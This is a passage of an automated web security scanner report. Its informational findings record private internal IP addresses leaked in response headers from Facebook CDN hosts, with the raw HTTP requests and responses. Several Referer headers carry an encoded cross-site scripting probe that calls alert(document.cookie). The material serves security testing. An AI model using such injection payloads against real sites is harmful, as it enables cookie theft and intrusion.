Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 03 Sep 2011 19:29:34 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.54.228.37
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:34 GMT
Content-Length: 385

fb_sharepro_render([{"url":"http:\/\/www.dnaindia.com\/sport\/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811","normalized_url":"http:\/\/www.dnaindia.com\/sport\/report_sachin-
...[SNIP]...

26.8. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315103831354 HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.32.179.130
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=1200
Expires: Sun, 04 Sep 2011 02:56:33 GMT
Date: Sun, 04 Sep 2011 02:36:33 GMT
Connection: close
Vary: Accept-Encoding

/*1315103793,169915266,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

26.9. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315103340476 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.32.167.119
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=1200
Expires: Sun, 04 Sep 2011 02:48:22 GMT
Date: Sun, 04 Sep 2011 02:28:22 GMT
Connection: close
Vary: Accept-Encoding

/*1315103302,169912183,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

26.10. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.33.31.125
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=390
Expires: Sun, 04 Sep 2011 02:42:56 GMT
Date: Sun, 04 Sep 2011 02:36:26 GMT
Connection: close
Vary: Accept-Encoding

/*1314922616,169942909,JIT Construction: v434031,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

26.11. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315103854260 HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india6a976%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.location)%3E1e77da311f0/48-hours-on-mumbai-airports-main-runway-still-shut-131142

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.32.183.198
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=1200
Expires: Sun, 04 Sep 2011 02:56:56 GMT
Date: Sun, 04 Sep 2011 02:36:56 GMT
Connection: close
Vary: Accept-Encoding

/*1315103816,169916358,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

26.12. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1315103193850 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "60d052dfdcb712efb06462cca965645c"
X-FB-Server: 10.32.91.106
X-Cnection: close
Content-Length: 133582
Cache-Control: public, max-age=108
Expires: Sun, 04 Sep 2011 02:45:55 GMT
Date: Sun, 04 Sep 2011 02:44:07 GMT
Connection: close
Vary: Accept-Encoding

/*1315103155,169892714,JIT Construction: v434551,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

26.13. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 3289
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 04 Aug 2011 21:10:10 GMT
X-FB-Server: 10.27.127.110
X-Cnection: close
Cache-Control: public, max-age=172572
Expires: Tue, 06 Sep 2011 02:35:48 GMT
Date: Sun, 04 Sep 2011 02:39:36 GMT
Connection: close

CWS.....x.}X.W.Yz._.n.$@B 0.Qnd.p!    ...l3...0.....m.P.t..-U1R    pOO...I.g..d.3..U6Yd.Mrf.....n...&.e.?..n.@..    ....w...
.....t.=!.@..N.B~..w .F.dg.....Z.idqw.B..6.....Vj.R....'.]...L...&.b......    .1ra..p.5
...[SNIP]...

26.14. http://developers.facebook.com/plugins/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.48.116
Connection: close
Date: Sun, 04 Sep 2011 04:14:55 GMT
Content-Length: 0


26.15. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQDB3_-1XnurOlzx&url=http%3A%2F%2Fstatic.social.ndtv.com%2Ffiles%2Fcrop%2F45x45%2Fphoto_pages_207_1271661594.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=http%3A%2F%2Fsocial.ndtv.com&width=313&height=315&header=false&colorscheme=light&font=arial&border_color=%23ffffff;&border=0;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.203.55
X-Cnection: close
Content-Length: 1261
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 02:34:07 GMT
Date: Sun, 04 Sep 2011 02:34:07 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

26.16. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQAYtyp-sNXdxcy3&url=http%3A%2F%2Fstatic.social.ndtv.com%2Fimages%2Fhm_icon_facebook.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=http%3A%2F%2Fsocial.ndtv.com&width=313&height=315&header=false&colorscheme=light&font=arial&border_color=%23ffffff;&border=0;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.64.147.41
X-Cnection: close
Content-Length: 1132
Vary: Accept-Encoding
Cache-Control: public, max-age=86400
Expires: Mon, 05 Sep 2011 03:39:07 GMT
Date: Sun, 04 Sep 2011 03:39:07 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

26.17. http://static.ak.connect.facebook.com/connect.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "dbfe7810d51b43160242bf8796785f1d"
X-FB-Server: 10.27.186.117
X-Cnection: close
Content-Length: 18454
Vary: Accept-Encoding
Cache-Control: public, max-age=944
Expires: Sun, 04 Sep 2011 02:41:26 GMT
Date: Sun, 04 Sep 2011 02:25:42 GMT
Connection: close

/*1315005597,169589365,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

26.18. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "8ce952d2c65a22739ac5aff98a6707a7"
X-FB-Server: 10.32.155.118
X-Cnection: close
Content-Length: 14288
Vary: Accept-Encoding
Cache-Control: public, max-age=870
Expires: Sun, 04 Sep 2011 02:40:15 GMT
Date: Sun, 04 Sep 2011 02:25:45 GMT
Connection: close

/*1311721510,169909110,JIT Construction: v411252,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

26.19. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e5cc11a203126c58f96818489fce672c"
X-FB-Server: 10.32.208.127
X-Cnection: close
Content-Length: 211322
Cache-Control: public, max-age=1059
Expires: Sun, 04 Sep 2011 02:43:24 GMT
Date: Sun, 04 Sep 2011 02:25:45 GMT
Connection: close
Vary: Accept-Encoding

/*1315005793,169922687,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

26.20. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/loaders/indicator_white_large.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_white_large.gif HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/toifanapp.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.33.19.106
X-Cnection: close
Content-Length: 1894
Cache-Control: max-age=85862
Expires: Mon, 05 Sep 2011 02:16:50 GMT
Date: Sun, 04 Sep 2011 02:25:48 GMT
Connection: close

GIF89a . ....................................................................................................!..NETSCAPE2.0.....!.......,.... . .....%.di.h..l..p,..ATxE....../.#X.H...<*G...y..*T.u....
...[SNIP]...

26.21. http://static.ak.fbcdn.net/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/newtoolbar/9855193.cms?args=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "64bd627bb6f1eb7845f4f8e6db00b15e"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.64.223.51
X-Cnection: close
Content-Length: 6585
Cache-Control: public, max-age=598
Expires: Sun, 04 Sep 2011 02:37:16 GMT
Date: Sun, 04 Sep 2011 02:27:18 GMT
Connection: close

/*1315005401,172023603,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

26.22. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php HTTP/1.1
Host: static.ak.fbcdn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.147.194
X-Cnection: close
Cache-Control: public, max-age=57045
Expires: Sun, 04 Sep 2011 20:10:05 GMT
Date: Sun, 04 Sep 2011 04:19:20 GMT
Content-Length: 2481
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.23. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8479cc917cf8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.181
Content-Length: 2481
Vary: Accept-Encoding
Cache-Control: public, max-age=58068
Expires: Sun, 04 Sep 2011 20:08:56 GMT
Date: Sun, 04 Sep 2011 04:01:08 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

26.24. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ql9vukDCc4R.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y7/r/ql9vukDCc4R.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y7/r/ql9vukDCc4R.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8479cc917cf8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190

Response

HTTP/1.1 200 OK
Content-Length: 1177
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:07 GMT
X-FB-Server: 10.138.64.182
Cache-Control: public, max-age=27990093
Expires: Tue, 24 Jul 2012 01:38:08 GMT
Date: Sun, 04 Sep 2011 02:36:35 GMT
Connection: close

.PNG
.
...IHDR...............2...#PLTE.........444...l........6X.......fff...s.....ddd...DDDUUUQl..E.......`x.......;Y..........MMMcx.u.................bw.............uuu...............h.......Xj.
...[SNIP]...

26.25. http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/bSOHtKbCGYI.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yU/r/bSOHtKbCGYI.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yU/r/bSOHtKbCGYI.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/newtoolbar/9855193.cms?args=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: image/png
Last-Modified: Mon, 04 Jul 2011 08:53:26 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Cache-Control: public, max-age=28130229
Expires: Wed, 25 Jul 2012 16:24:33 GMT
Date: Sun, 04 Sep 2011 02:27:24 GMT
Connection: close

.PNG
.
...IHDR.............+.<....,IDAT.[c.u...7..b`.l. 1.    ...P$`.(...p    tA..6..|..........IEND.B`.

26.26. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/GetYmfGSJIt.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yv/r/GetYmfGSJIt.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yv/r/GetYmfGSJIt.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b8479cc917cf8%26origin%3Dhttp%253A%252F%252Fwww.ndtv.com%252Ff14d95cc52f2d7c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=190

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 29 Aug 2011 02:15:01 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 17261
Vary: Accept-Encoding
Cache-Control: public, max-age=31022868
Expires: Tue, 28 Aug 2012 04:04:23 GMT
Date: Sun, 04 Sep 2011 02:36:35 GMT
Connection: close

/*1314590680,169776067*/

.pas{padding:5px}
.pam{padding:10px}
.pal{padding:20px}
.pts{padding-top:5px}
.ptm{padding-top:10px}
.ptl{padding-top:20px}
.prs{padding-right:5px}
.prm{padding-right:10px}
.
...[SNIP]...

26.27. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/zZEOQP4uOC1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yx/r/zZEOQP4uOC1.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.connect.facebook.com/widgets/fan.php?api_key=731d4310e657b3903e3002a6432bca32&channel_url=http%3A%2F%2Ftimesofindia.indiatimes.com%2Ftoifanapp.cms%3Ffbc_channel%3D1&id=26781952138&name=&width=300&connections=&stream=0&logobar=1&css=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
